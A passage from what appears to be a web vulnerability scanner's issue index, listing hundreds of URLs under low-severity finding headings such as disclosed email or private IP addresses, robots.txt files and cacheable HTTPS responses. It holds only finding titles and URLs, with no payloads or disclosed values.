26.261. http://www.swarminteractive.com/

26.262. http://www.t-mobilescoop.com/

26.263. http://www.technews.am/

26.264. http://www.techtalkz.com/

26.265. http://www.teensfilm.com/

26.266. http://www.tellmehowto.net/

26.267. http://www.thaimisc.com/

26.268. http://www.the-bikini.com/

26.269. http://www.the-clitoris.com/

26.270. http://www.thebeatles.com/

26.271. http://www.thefactsaboutfitness.com/

26.272. http://www.thefastresult.com/

26.273. http://www.thegreenhead.com/

26.274. http://www.thehothits.com/

26.275. http://www.thehunsearch.com/

26.276. http://www.theteachersguide.com/

26.277. http://www.thewallpapers.org/

26.278. http://www.ticketluck.com/

26.279. http://www.tjc.edu/

26.280. http://www.tomorrowsworld.org/

26.281. http://www.top-10-list.org/

26.282. http://www.top21sites.com/

26.283. http://www.tradingplaceamerica.com/

26.284. http://www.trilulilu.ro/

26.285. http://www.truzu.com/

26.286. http://www.tutorialized.com/

26.287. http://www.tvgrapevine.com/

26.288. http://www.tvmovie.de/

26.289. http://www.twitter-icons.net/

26.290. http://www.undisciplined-subs.com/

26.291. http://www.uni.cc/

26.292. http://www.unjiloma.info/

26.293. http://www.unlimitedgamer.net/

26.294. http://www.unscramble.net/

26.295. http://www.usa4sale.net/

26.296. http://www.usdebtclock.org/

26.297. http://www.usmortgagerelief.org/

26.298. http://www.usovernightcheck.com/

26.299. http://www.villagehatshop.com/

26.300. http://www.vocal.com/

26.301. http://www.watchfreetvonline.net/

26.302. http://www.web-ppc.com/

26.303. http://www.webme.com/

26.304. http://www.webstore.com/

26.305. http://www.whiskeyclips.com/

26.306. http://www.worldnewstwo.com/

26.307. http://www.worldtvpc.com/

26.308. http://www.wponew.com/

26.309. http://www.wrestlezone.com/

26.310. http://www.wwmt.com/

26.311. http://www.xbox360iso.com/

26.312. http://www.yeahbaby.com/

26.313. http://www.ymlp44.com/

26.314. http://www.yng.me/

27. Email addresses disclosed

27.1. http://ads.adbrite.com/adserver/behavioral-data/8201

27.2. http://ads.adbrite.com/adserver/behavioral-data/8201

27.3. http://ads.adbrite.com/adserver/vdi/762701

27.4. http://ads2.adbrite.com/v0/ad

27.5. http://ads2.adbrite.com/v0/ad

27.6. http://cdn.js-kit.com/scripts/comments.js

27.7. http://insurancenewsnet.com/styles/maintest.css

27.8. http://www.agingass.com/favicon.ico

27.9. http://www.corp.att.com/attsearch/sayt/search-as-you-type.js

27.10. http://www.cosmeticscop.com/favicon.ico

27.11. http://www.crankyape.com/

27.12. http://www.crankyape.com/favicon.ico

27.13. http://www.crankyape.com/javascripts/prototype.js

27.14. http://www.crankyape.com/javascripts/validation.js

27.15. https://www.crankyape.com/default.asp

27.16. https://www.crankyape.com/javascripts/prototype.js

27.17. https://www.crankyape.com/javascripts/validation.js

27.18. http://www.ec51.com/favicon.ico

27.19. http://www.girlfriendsecret.com/favicon.ico

27.20. http://www.google.com/uds/api/visualization/1.0/6b277f80b1043ed67e7dcd564353f3d8/default,geomap.I.js

27.21. http://www.headsets.com/favicon.ico

27.22. http://www.herematures.com/favicon.ico

27.23. http://www.heresquirt.com/favicon.ico

27.24. http://www.herestuds.tv/favicon.ico

27.25. http://www.hlsm.com/

27.26. http://www.hotwheelscollectors.com/HWCErrorPage.aspx

27.27. http://www.jacksonnewspapers.com/favicon.ico

27.28. http://www.japanator.com/elephant/login.phtml

27.29. http://www.japanator.com/elephant/signup.phtml

27.30. http://www.links4vids.com/favicon.ico

27.31. http://www.lsitools.com/favicon.ico

27.32. http://www.marrow.org/favicon.ico

27.33. http://www.mashastube.com/favicon.ico

27.34. http://www.momvictress.com/favicon.ico

27.35. http://www.mylovedpee.com/favicon.ico

27.36. http://www.mylovedspy.com/favicon.ico

27.37. https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Top.htm

27.38. http://www.questcomp.com/favicon.ico

27.39. http://www.rtvchannel.tv/favicon.ico

27.40. http://www.sadocabin.com/favicon.ico

27.41. http://www.sassieshop.com/favicon.ico

27.42. http://www.washingtonpost.com/wp-adv/jobs4/javascript/jobs_footer.js

27.43. http://www.washingtonpost.com/wp-adv/jobs4/javascript/jqModal.js

27.44. http://www.xhost.ro/favicon.ico

28. Private IP addresses disclosed

28.1. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US

28.2. http://static.ak.facebook.com/js/api_lib/v0.4/XdCommReceiver.js

28.3. http://www.bucadibeppo.com/favicon.ico

28.4. http://www.cupcakesandcashmere.com/favicon.ico

28.5. http://www.encomer.com/favicon.ico

28.6. http://www.facebook.com/extern/login_status.php

28.7. http://www.facebook.com/extern/login_status.php

28.8. http://www.facebook.com/extern/login_status.php

28.9. http://www.facebook.com/extern/login_status.php

28.10. http://www.facebook.com/plugins/like.php

28.11. http://www.gohawaii.com/favicon.ico

28.12. http://www.google.com/sdch/rU20-FBA.dct

28.13. http://www.homebusinessconnection.com/favicon.ico

28.14. http://www.latinamericancupid.com/favicon.ico

28.15. http://www.mochigames.com/favicon.ico

28.16. http://www.nflgridirongab.com/favicon.ico

28.17. http://www.onlocationvacations.com/favicon.ico

28.18. http://www.searchcactus.com/favicon.ico

28.19. http://www.sunshinereview.org/favicon.ico

28.20. http://www.sweepsadvantage.com/favicon.ico

29. Credit card numbers disclosed

29.1. http://csrc.nist.gov/publications/nistpubs/800-40-Ver2/SP800-40v2.pdf

29.2. http://www.bing.com/search

30. Robots.txt file

30.1. http://0.gravatar.com/avatar/a76bb4a499349279e0339b78885213c6

30.2. http://0.r.msn.com/

30.3. http://1.gravatar.com/avatar/31345061262d8fde4fa5256164900115

30.4. http://1051679.r.msn.com/

30.5. http://1188110.r.msn.com/

30.6. http://ad.doubleclick.net/adi/N3382.Yahoo/B5116950.16

30.7. http://ad.turn.com/server/pixel.htm

30.8. http://adx.g.doubleclick.net/pagead/adview

30.9. http://ajax.googleapis.com/ajax/static/modules/gviz/1.0/geomap/geomap.swf

30.10. http://b.scorecardresearch.com/b

30.11. http://bs.serving-sys.com/BurstingPipe/adServer.bs

30.12. http://c.statcounter.com/t.php

30.13. http://cdn.turn.com/server/ddc.htm

30.14. http://cm.g.doubleclick.net/pixel

30.15. http://csrc.nist.gov/publications/nistpubs/800-40-Ver2/SP800-40v2.pdf

30.16. http://d.chango.com/m/s/AdBrite

30.17. http://d1.openx.org/afr.php

30.18. http://digg.com/tools/diggthis.js

30.19. http://ds.serving-sys.com/BurstingCachedScripts//SBTemplates_2_2_7/StdBanner.js

30.20. http://googleads.g.doubleclick.net/pagead/ads

30.21. http://insurancenewsnet.com/article.aspx

30.22. http://loadm.exelator.com/load/

30.23. http://loadus.exelator.com/load/

30.24. http://map.media6degrees.com/orbserv/hbpix

30.25. http://media.washingtonpost.com/wp-srv/ad/wpni_generic_ad.js

30.26. http://metrics.washingtonpost.com/b/ss/wpnipostcomjobs/1/H.22.1/s96068415066692

30.27. http://n4403ad.doubleclick.net/adj/gn.japanator.com/home

30.28. http://na.decdna.net/n/61239/71938/EI6/x/e

30.29. http://news.yahoo.com/s/prweb/20110427/bs_prweb/prweb5276794

30.30. http://online.wsj.com/internal/ModTwitWSJMarkets.htm

30.31. http://pagead2.googlesyndication.com/pagead/imgad

30.32. http://pixel.invitemedia.com/admeld_sync

30.33. http://pixel.quantserve.com/pixel

30.34. http://pubads.g.doubleclick.net/gampad/ads

30.35. http://r.turn.com/server/pixel.htm

30.36. http://router.infolinks.com/gsd/1304319928277.0

30.37. http://s0.2mdn.net/807725/OSA_Save_It_728x90_NoXML_1loop_102210_v001.swf

30.38. http://segment-pixel.invitemedia.com/set_partner_uid

30.39. http://static.ak.facebook.com/js/api_lib/v0.4/XdCommReceiver.js

30.40. http://static.pulse360.com/blob/fb/6e141bc3_social_security_card.jpg

30.41. http://sync.mathtag.com/sync/img

30.42. http://tag.admeld.com/match

30.43. http://translate.googleapis.com/translate_a/l

30.44. http://us.bc.yahoo.com/b

30.45. http://usjobsresource.com/3

30.46. http://va.px.invitemedia.com/goog_imp

30.47. http://view.atdmt.com/ADO/view/284156785/direct

30.48. http://websiteprice.net/result/

30.49. http://widgets.digg.com/buttons/count

30.50. http://www.1728.com/favicon.ico

30.51. http://www.3fatchicks.com/favicon.ico

30.52. http://www.4tubehd.com/favicon.ico

30.53. http://www.6mmbr.com/favicon.ico

30.54. http://www.aacap.org/favicon.ico

30.55. http://www.abcpaydaydirect.com/favicon.ico

30.56. http://www.abdopain.com/favicon.ico

30.57. http://www.acadiaferry.com/favicon.ico

30.58. http://www.accesskansas.org/favicon.ico

30.59. http://www.aces.edu/favicon.ico

30.60. http://www.activexguide.com/favicon.ico

30.61. http://www.allelectronics.com/favicon.ico

30.62. http://www.alphashark.com/favicon.ico

30.63. http://www.amateurow.com/favicon.ico

30.64. http://www.americanbible.org/favicon.ico

30.65. http://www.americanclassifieds.com/favicon.ico

30.66. http://www.androidtablets.net/favicon.ico

30.67. http://www.anilinkz.com/favicon.ico

30.68. http://www.animatedknots.com/favicon.ico

30.69. http://www.anvato.com/favicon.ico

30.70. http://www.aol.co.uk/favicon.ico

30.71. http://www.apartmentsmart.com/favicon.ico

30.72. http://www.architecturaldigest.com/favicon.ico

30.73. http://www.argosy.edu/favicon.ico

30.74. http://www.arkive.org/favicon.ico

30.75. http://www.arktimes.com/favicon.ico

30.76. http://www.armchairgeneral.com/favicon.ico

30.77. http://www.ashtondrake.com/favicon.ico

30.78. http://www.assistedliving.com/favicon.ico

30.79. http://www.autotrafficavalanche.com/favicon.ico

30.80. http://www.awltovhc.com/image-4989411-10774308

30.81. http://www.bakingbites.com/favicon.ico

30.82. http://www.bankforeclosuressale.com/favicon.ico

30.83. http://www.bankonyourself.com/favicon.ico

30.84. http://www.barnstormers.com/favicon.ico

30.85. http://www.beauty-advices.com/favicon.ico

30.86. http://www.beefybulldog.com/favicon.ico

30.87. http://www.bestbridalprices.com/favicon.ico

30.88. http://www.blackanddeckerappliances.com/favicon.ico

30.89. http://www.bloodhero.com/favicon.ico

30.90. http://www.bluesplayer.co.uk/favicon.ico

30.91. http://www.bnbtobacco.com/favicon.ico

30.92. http://www.boatmotors.com/favicon.ico

30.93. http://www.bocajava.com/favicon.ico

30.94. http://www.bonhams.com/favicon.ico

30.95. http://www.boredpanda.com/favicon.ico

30.96. http://www.brookshirebrothers.com/favicon.ico

30.97. http://www.bucadibeppo.com/favicon.ico

30.98. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/

30.99. http://www.calculatorcat.com/favicon.ico

30.100. http://www.calvarywilliamsport.com/favicon.ico

30.101. http://www.camp-california.com/favicon.ico

30.102. http://www.capterra.com/favicon.ico

30.103. http://www.carfolio.com/favicon.ico

30.104. http://www.carsforagrand.com/favicon.ico

30.105. http://www.cato-at-liberty.org/favicon.ico

30.106. http://www.cbs8.com/favicon.ico

30.107. http://www.celebridiot.com/favicon.ico

30.108. http://www.celebtna.com/favicon.ico

30.109. http://www.celebzilla.com/favicon.ico

30.110. http://www.celiac.com/favicon.ico

30.111. http://www.cellreception.com/favicon.ico

30.112. http://www.cfigroup.com/favicon.ico

30.113. http://www.cheapism.com/favicon.ico

30.114. http://www.chicoer.com/favicon.ico

30.115. http://www.chrisbrownworld.com/favicon.ico

30.116. http://www.christnotes.org/favicon.ico

30.117. http://www.cirrusimage.com/favicon.ico

30.118. http://www.classfinders.com/favicon.ico

30.119. http://www.clickinks.com/favicon.ico

30.120. http://www.connectamarillo.com/favicon.ico

30.121. http://www.convergedirect.com/favicon.ico

30.122. http://www.copygator.com/favicon.ico

30.123. http://www.cosmeticscop.com/favicon.ico

30.124. http://www.countrytabs.com/favicon.ico

30.125. http://www.coupondad.net/favicon.ico

30.126. http://www.craftjr.com/favicon.ico

30.127. http://www.craigslistfoundation.org/favicon.ico

30.128. http://www.crankyape.com/favicon.ico

30.129. https://www.crankyape.com/default.asp

30.130. http://www.creativekidsathome.com/favicon.ico

30.131. http://www.creditunionsonline.com/favicon.ico

30.132. http://www.crengland.com/favicon.ico

30.133. http://www.cricbuzz.com/favicon.ico

30.134. http://www.cumminsforum.com/favicon.ico

30.135. http://www.cupcakesandcashmere.com/favicon.ico

30.136. http://www.dailynewnowa.com/favicon.ico

30.137. http://www.dallasguns.com/favicon.ico

30.138. http://www.dells.com/favicon.ico

30.139. http://www.developer.com/favicon.ico

30.140. http://www.dezeen.com/favicon.ico

30.141. http://www.diabetesdaily.com/favicon.ico

30.142. http://www.diabetesjournals.org/favicon.ico

30.143. http://www.docufide.com/favicon.ico

30.144. http://www.dotmed.com/favicon.ico

30.145. http://www.dotnetspark.com/favicon.ico

30.146. http://www.downloadroute.com/favicon.ico

30.147. http://www.downv.com/favicon.ico

30.148. http://www.drivewire.com/favicon.ico

30.149. http://www.droiddog.com/favicon.ico

30.150. http://www.drudge.com/favicon.ico

30.151. http://www.earlham.edu/favicon.ico

30.152. http://www.ec51.com/favicon.ico

30.153. http://www.edeals.com/favicon.ico

30.154. http://www.eders.com/favicon.ico

30.155. http://www.ehobbies.com/favicon.ico

30.156. http://www.elanaspantry.com/favicon.ico

30.157. http://www.encomer.com/favicon.ico

30.158. http://www.ephotozine.com/favicon.ico

30.159. http://www.etimspayments.com/favicon.ico

30.160. http://www.excellence-resorts.com/favicon.ico

30.161. http://www.expatforum.com/favicon.ico

30.162. http://www.express.co.uk/favicon.ico

30.163. http://www.ezboard.com/favicon.ico

30.164. http://www.ezisp.info/favicon.ico

30.165. http://www.ezjoblistings.com/favicon.ico

30.166. http://www.ezwebsitecounter.com/favicon.ico

30.167. http://www.facebook.com/plugins/like.php

30.168. http://www.facepinch.com/favicon.ico

30.169. http://www.faithclipart.com/favicon.ico

30.170. http://www.famegame.com/favicon.ico

30.171. http://www.fashionbombdaily.com/favicon.ico

30.172. http://www.febreze.com/favicon.ico

30.173. http://www.fedstats.gov/favicon.ico

30.174. http://www.feedagg.com/favicon.ico

30.175. http://www.fenomen-games.com/favicon.ico

30.176. http://www.fibromyalgia-symptoms.org/favicon.ico

30.177. http://www.final4ever.com/favicon.ico

30.178. http://www.firstload.de/favicon.ico

30.179. http://www.firstpeople.us/favicon.ico

30.180. http://www.flushotsusa.com/favicon.ico

30.181. http://www.foot-pain-explained.com/favicon.ico

30.182. http://www.forrabbits.eu/favicon.ico

30.183. http://www.fredflare.com/favicon.ico

30.184. http://www.freegamesnews.com/favicon.ico

30.185. http://www.freei.me/favicon.ico

30.186. http://www.freemooviesonline.com/favicon.ico

30.187. http://www.ftjcfx.com/image-4989411-10867633

30.188. http://www.fulltiltpoker.net/favicon.ico

30.189. http://www.gaf.com/favicon.ico

30.190. http://www.garden.org/favicon.ico

30.191. http://www.gastongazette.com/favicon.ico

30.192. http://www.gearfuse.com/favicon.ico

30.193. http://www.giantblackhooters.com/favicon.ico

30.194. http://www.girlscoutshop.com/favicon.ico

30.195. http://www.globelifeapplication.com/favicon.ico

30.196. http://www.gocrimson.com/favicon.ico

30.197. http://www.gohawaii.com/favicon.ico

30.198. http://www.goldpassport.com/favicon.ico

30.199. http://www.goodtoknow.co.uk/favicon.ico

30.200. http://www.google-analytics.com/__utm.gif

30.201. http://www.gov-auctions.org/favicon.ico

30.202. http://www.grannarium.com/favicon.ico

30.203. http://www.greenbuildingadvisor.com/favicon.ico

30.204. http://www.greensmoke.com/favicon.ico

30.205. http://www.guitarnoise.com/favicon.ico

30.206. http://www.gwawa.com/favicon.ico

30.207. http://www.hairyfilm.com/favicon.ico

30.208. http://www.hairysupreme.com/favicon.ico

30.209. http://www.halfpriceozarks.com/favicon.ico

30.210. http://www.hannaandersson.com/favicon.ico

30.211. http://www.harlandclarke.com/favicon.ico

30.212. http://www.hauteliving.com/favicon.ico

30.213. http://www.headsets.com/favicon.ico

30.214. http://www.healthination.com/favicon.ico

30.215. http://www.healthykids.org/favicon.ico

30.216. http://www.heartlandconnection.com/favicon.ico

30.217. http://www.heartspring.net/favicon.ico

30.218. http://www.hellobc.com/favicon.ico

30.219. http://www.hematologylibrary.org/favicon.ico

30.220. http://www.herematures.com/favicon.ico

30.221. http://www.heresquirt.com/favicon.ico

30.222. http://www.herestuds.tv/favicon.ico

30.223. http://www.herpesonline.org/favicon.ico

30.224. http://www.hiddengalleries.com/favicon.ico

30.225. http://www.highcharts.com/highslide/graphics/zoomout.cur

30.226. http://www.highspeedinternet.com/favicon.ico

30.227. http://www.hittracker.org/favicon.ico

30.228. http://www.hlsm.com/

30.229. http://www.homebusinessconnection.com/favicon.ico

30.230. http://www.hot18teens.com/favicon.ico

30.231. http://www.hotelgrandpacific.com/favicon.ico

30.232. http://www.hotspotshield.com/favicon.ico

30.233. http://www.howitshouldhaveended.com/favicon.ico

30.234. http://www.hudhouses.com/favicon.ico

30.235. http://www.hyperhistory.net/favicon.ico

30.236. http://www.ibegin.com/weather/weather_widget.php

30.237. http://www.icd9data.com/favicon.ico

30.238. http://www.icomamerica.com/favicon.ico

30.239. http://www.idealwifes.com/favicon.ico

30.240. http://www.igl.net/favicon.ico

30.241. http://www.ilmeteo.it/favicon.ico

30.242. http://www.index.com/favicon.ico

30.243. http://www.info.org.il/favicon.ico

30.244. http://www.inosmi.ru/favicon.ico

30.245. http://www.iptv.org/favicon.ico

30.246. http://www.irishfest.com/favicon.ico

30.247. http://www.itracks.com/favicon.ico

30.248. http://www.jacksonnewspapers.com/favicon.ico

30.249. http://www.jacksonsun.com/favicon.ico

30.250. http://www.javaworld.com/favicon.ico

30.251. http://www.jhoos.com/favicon.ico

30.252. http://www.jmu.edu/favicon.ico

30.253. http://www.jobsahoy.net/favicon.ico

30.254. http://www.journalstandard.com/favicon.ico

30.255. http://www.jpfun.com/favicon.ico

30.256. http://www.keds.com/favicon.ico

30.257. http://www.kellehampton.com/favicon.ico

30.258. http://www.kens5.com/favicon.ico

30.259. http://www.kingpayday.net/favicon.ico

30.260. http://www.knowledgerush.com/favicon.ico

30.261. http://www.knowyourmobile.com/favicon.ico

30.262. http://www.kobobooks.com/favicon.ico

30.263. http://www.kottke.org/favicon.ico

30.264. http://www.ksrevenue.org/favicon.ico

30.265. http://www.kxii.com/favicon.ico

30.266. http://www.lacetoleather.com/favicon.ico

30.267. http://www.latingossip.com/favicon.ico

30.268. http://www.lavalife.com/favicon.ico

30.269. http://www.ldoceonline.com/favicon.ico

30.270. http://www.lduhtrp.net/image-4989411-10765500

30.271. http://www.lee.net/favicon.ico

30.272. http://www.lenox.com/favicon.ico

30.273. http://www.leo.org/favicon.ico

30.274. http://www.libertytax.com/favicon.ico

30.275. http://www.livedash.com/favicon.ico

30.276. http://www.livingonadime.com/favicon.ico

30.277. http://www.ljseek.com/favicon.ico

30.278. http://www.llewellyn.com/favicon.ico

30.279. http://www.localedge.com/favicon.ico

30.280. http://www.localism.com/favicon.ico

30.281. http://www.localtvllc.com/favicon.ico

30.282. http://www.longislandexchange.com/favicon.ico

30.283. http://www.looktothestars.org/favicon.ico

30.284. http://www.lowerhealthquotes.com/favicon.ico

30.285. http://www.lowerpressure.com/favicon.ico

30.286. http://www.lsureveille.com/favicon.ico

30.287. http://www.lttmlistings.com/favicon.ico

30.288. http://www.luckyasiangirls.com/favicon.ico

30.289. http://www.lyred.com/favicon.ico

30.290. http://www.mangastream.com/favicon.ico

30.291. http://www.map24.com/favicon.ico

30.292. http://www.mappy.com/favicon.ico

30.293. http://www.marketintellisearch.com/favicon.ico

30.294. http://www.marrow.org/favicon.ico

30.295. http://www.mdconsult.com/favicon.ico

30.296. http://www.megajackpot4life.com/favicon.ico

30.297. http://www.mental-health-matters.com/favicon.ico

30.298. http://www.mexconnect.com/favicon.ico

30.299. http://www.michiganmessenger.com/favicon.ico

30.300. http://www.microchip.com/favicon.ico

30.301. http://www.mihomepaper.com/favicon.ico

30.302. http://www.milwaukee.gov/favicon.ico

30.303. http://www.moroccanoil.com/favicon.ico

30.304. http://www.mrsdash.com/favicon.ico

30.305. http://www.mst.edu/favicon.ico

30.306. http://www.mumsnet.com/favicon.ico

30.307. http://www.muschealth.com/favicon.ico

30.308. http://www.museum.tv/favicon.ico

30.309. http://www.musicoutfitters.com/favicon.ico

30.310. http://www.myfoxboston.com/favicon.ico

30.311. http://www.myfoxchicago.com/favicon.ico

30.312. http://www.mylearningplan.com/favicon.ico

30.313. http://www.mylovedpee.com/favicon.ico

30.314. http://www.mylovedspy.com/favicon.ico

30.315. http://www.mynews.in/favicon.ico

30.316. http://www.mypearsonstore.com/favicon.ico

30.317. http://www.myregistry.com/favicon.ico

30.318. http://www.myrtlebeach-resorts.com/favicon.ico

30.319. http://www.mytattoogallery.com/favicon.ico

30.320. http://www.mytelus.com/favicon.ico

30.321. http://www.nartube.net/favicon.ico

30.322. http://www.ncgenweb.us/favicon.ico

30.323. http://www.ndsmcobserver.com/favicon.ico

30.324. http://www.newenglandmoves.com/favicon.ico

30.325. http://www.nflgridirongab.com/favicon.ico

30.326. http://www.nhregister.com/favicon.ico

30.327. http://www.nikonrumors.com/favicon.ico

30.328. http://www.ntb.com/favicon.ico

30.329. http://www.numerologist.com/favicon.ico

30.330. http://www.nursing-jobs.us/favicon.ico

30.331. http://www.onlinemoneystash.com/favicon.ico

30.332. http://www.onlinetextmessage.com/favicon.ico

30.333. http://www.onlocationvacations.com/favicon.ico

30.334. http://www.organicgardening.com/favicon.ico

30.335. http://www.orlandojobs.com/favicon.ico

30.336. http://www.oshkosh365.org/favicon.ico

30.337. http://www.oshkoshbgosh.com/favicon.ico

30.338. http://www.ourmidland.com/favicon.ico

30.339. http://www.ourprayer.org/favicon.ico

30.340. http://www.outdoor-babes.com/favicon.ico

30.341. http://www.outdoorjp.com/favicon.ico

30.342. http://www.oxfamamerica.org/favicon.ico

30.343. http://www.pal-item.com/favicon.ico

30.344. http://www.pashnit.com/favicon.ico

30.345. http://www.patdollard.com/favicon.ico

30.346. http://www.pdga.com/favicon.ico

30.347. http://www.pearljam.com/favicon.ico

30.348. http://www.pearsoncmg.com/favicon.ico

30.349. http://www.petri.co.il/favicon.ico

30.350. http://www.pfaw.org/favicon.ico

30.351. http://www.philabundance.org/favicon.ico

30.352. http://www.pinkemo.com/favicon.ico

30.353. http://www.playmobilusa.com/favicon.ico

30.354. http://www.plccenter.com/favicon.ico

30.355. http://www.plosone.org/favicon.ico

30.356. http://www.popdose.com/favicon.ico

30.357. http://www.popular-wedding-songs.com/favicon.ico

30.358. http://www.ppld.org/favicon.ico

30.359. http://www.pregnancyguideonline.com/favicon.ico

30.360. http://www.prontotech.com/favicon.ico

30.361. http://www.ptla.org/favicon.ico

30.362. http://www.pumpkinlabs.com/ads/ad-geo-contextual.php

30.363. http://www.qbike.com/favicon.ico

30.364. http://www.questcomp.com/favicon.ico

30.365. http://www.quiltingboard.com/favicon.ico

30.366. http://www.quizrocket.com/favicon.ico

30.367. http://www.rappahannock.edu/favicon.ico

30.368. http://www.rc-airplane-world.com/favicon.ico

30.369. http://www.redcounty.com/favicon.ico

30.370. http://www.reelseo.com/favicon.ico

30.371. http://www.rezstreamsynch.net/favicon.ico

30.372. http://www.riu.com/favicon.ico

30.373. http://www.rnbxclusive.com/favicon.ico

30.374. http://www.ronnies.com/micro.htm

30.375. http://www.ronniesmailorder.com/fiche_select.asp

30.376. http://www.rtsports.com/favicon.ico

30.377. http://www.ryder.com/favicon.ico

30.378. http://www.s10forum.com/favicon.ico

30.379. http://www.sailboatlistings.com/favicon.ico

30.380. http://www.schnucks.com/favicon.ico

30.381. http://www.schoolsk-12.com/favicon.ico

30.382. http://www.sdge.com/favicon.ico

30.383. http://www.seiu.org/favicon.ico

30.384. http://www.seoq.com/webstatshq/www.onlinemicrofiche.com

30.385. http://www.shareup.com/favicon.ico

30.386. http://www.sheddaquarium.org/favicon.ico

30.387. http://www.shoppingsage.info/favicon.ico

30.388. http://www.slotocash.com/favicon.ico

30.389. http://www.smoker-cooking.com/favicon.ico

30.390. http://www.snapdealz.com/favicon.ico

30.391. http://www.softlist.net/favicon.ico

30.392. http://www.songs-lyrics.net/favicon.ico

30.393. http://www.spirit-of-metal.com/favicon.ico

30.394. http://www.stoik.com/favicon.ico

30.395. http://www.studylight.org/favicon.ico

30.396. http://www.style-hair-magazine.com/favicon.ico

30.397. http://www.superhost.pl/favicon.ico

30.398. http://www.support.com/favicon.ico

30.399. http://www.sweepsadvantage.com/favicon.ico

30.400. http://www.sythe.org/favicon.ico

30.401. http://www.tacklewarehouse.com/favicon.ico

30.402. http://www.techonlife.com/favicon.ico

30.403. http://www.techtalkz.com/favicon.ico

30.404. http://www.teensfilm.com/favicon.ico

30.405. http://www.tellmehowto.net/favicon.ico

30.406. http://www.tenniswarehouse.com/favicon.ico

30.407. http://www.thaimisc.com/favicon.ico

30.408. http://www.the-bikini.com/favicon.ico

30.409. http://www.the-clitoris.com/favicon.ico

30.410. http://www.theday.com/favicon.ico

30.411. http://www.thefactsaboutfitness.com/favicon.ico

30.412. http://www.thefordstory.com/favicon.ico

30.413. http://www.thehothits.com/favicon.ico

30.414. http://www.thehunsearch.com/favicon.ico

30.415. http://www.theteachersguide.com/favicon.ico

30.416. http://www.ticketluck.com/favicon.ico

30.417. http://www.timezoneconverter.com/favicon.ico

30.418. http://www.tomorrowsworld.org/favicon.ico

30.419. http://www.top-10-list.org/favicon.ico

30.420. http://www.top21sites.com/favicon.ico

30.421. http://www.toyotacertified.com/favicon.ico

30.422. http://www.tqlkg.com/image-4989411-10732263

30.423. http://www.tradingplaceamerica.com/favicon.ico

30.424. http://www.traditionalmusic.co.uk/favicon.ico

30.425. http://www.travel-library.com/favicon.ico

30.426. http://www.trilulilu.ro/favicon.ico

30.427. http://www.trincoll.edu/favicon.ico

30.428. http://www.truzu.com/favicon.ico

30.429. http://www.tutorialized.com/favicon.ico

30.430. http://www.tva.gov/favicon.ico

30.431. http://www.tvgrapevine.com/favicon.ico

30.432. http://www.tvmovie.de/favicon.ico

30.433. http://www.twopair.com/favicon.ico

30.434. http://www.uloric.com/favicon.ico

30.435. http://www.undisciplined-subs.com/favicon.ico

30.436. http://www.uni.cc/favicon.ico

30.437. http://www.uni.edu/favicon.ico

30.438. http://www.unlimitedgamer.net/favicon.ico

30.439. http://www.unrealitymag.com/favicon.ico

30.440. http://www.unscramble.net/favicon.ico

30.441. http://www.usa4sale.net/favicon.ico

30.442. http://www.usahockey.com/favicon.ico

30.443. http://www.usedpartscentral.com/favicon.ico

30.444. http://www.usjobsources.com/MjMwODJ8NzA2N3wxMjYwNjY3fHYy/r

30.445. http://www.vhlcentral.com/favicon.ico

30.446. http://www.villagehatshop.com/favicon.ico

30.447. http://www.virtual-hairstyles.com/favicon.ico

30.448. http://www.vocal.com/favicon.ico

30.449. http://www.voiceofsandiego.org/favicon.ico

30.450. http://www.walthers.com/favicon.ico

30.451. http://www.washingtonpost.com/wl/jobs/home

30.452. http://www.wcpss.net/favicon.ico

30.453. http://www.webme.com/favicon.ico

30.454. http://www.webstore.com/favicon.ico

30.455. http://www.weedsthatplease.com/favicon.ico

30.456. http://www.westjet.com/favicon.ico

30.457. http://www.whiskeyclips.com/favicon.ico

30.458. http://www.whosampled.com/favicon.ico

30.459. http://www.wirelessadvisor.com/favicon.ico

30.460. http://www.wmms.com/favicon.ico

30.461. http://www.womansdivorce.com/favicon.ico

30.462. http://www.worldnewstwo.com/favicon.ico

30.463. http://www.worldtvpc.com/favicon.ico

30.464. http://www.wpsdlocal6.com/favicon.ico

30.465. http://www.wretch.cc/favicon.ico

30.466. http://www.wsfa.com/favicon.ico

30.467. http://www.wtoc.com/favicon.ico

30.468. http://www.wtrf.com/favicon.ico

30.469. http://www.wtuber.com/favicon.ico

30.470. http://www.wwmt.com/favicon.ico

30.471. http://www.xhost.ro/favicon.ico

30.472. http://www.xilisoft.com/favicon.ico

30.473. http://www.yeahbaby.com/favicon.ico

30.474. http://www.ymlp44.com/favicon.ico

30.475. http://www.yorku.ca/favicon.ico

30.476. http://www.youneek.com/favicon.ico

31. Cacheable HTTPS response

31.1. https://www.crankyape.com/AJAXWebServices/geographicServices.asmx/getCountries

31.2. https://www.crankyape.com/AJAXWebServices/geographicServices.asmx/getStates

31.3. https://www.crankyape.com/member/

31.4. https://www.crankyape.com/member/registration.aspx

31.5. https://www.onlinemicrofiche.com/Electronicpartsfinder/dealerinfo/DealerInfo.asp

31.6. https://www.onlinemicrofiche.com/WPS/shoppingcart/Shoppingcart/ProcessOrder.asp

31.7. https://www.onlinemicrofiche.com/WPS/shoppingcart/checkout/Navigation.asp

31.8. https://www.onlinemicrofiche.com/WPS/shoppingcart/checkout/Top.htm

31.9. https://www.onlinemicrofiche.com/WPS/shoppingcart/checkout/Viewcart.asp

31.10. https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Navigation.asp

31.11. https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Top.htm

31.12. https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Viewcart.asp

31.13. https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/Shoppingcart/ProcessOrder.asp

32. Multiple content types specified

32.1. http://www.convergedirect.com/favicon.ico

32.2. http://www.procuts.com/favicon.ico

33. HTML does not specify charset

33.1. http://ad.doubleclick.net/adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11

33.2. http://ad.doubleclick.net/adi/N3382.Yahoo/B5116950.16

33.3. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32

33.4. http://ad.yieldmanager.com/iframe3

33.5. http://ads-vrx.adbrite.com/adserver/display_iab_ads

33.6. http://bs.serving-sys.com/BurstingPipe/adServer.bs

33.7. http://content.pulse360.com/CC4A2528-2176-11DF-BB34-61FFECADD848

33.8. http://danilolee.com/cgi-sys/suspendedpage.cgi

33.9. http://loadus.exelator.com/load/net.php

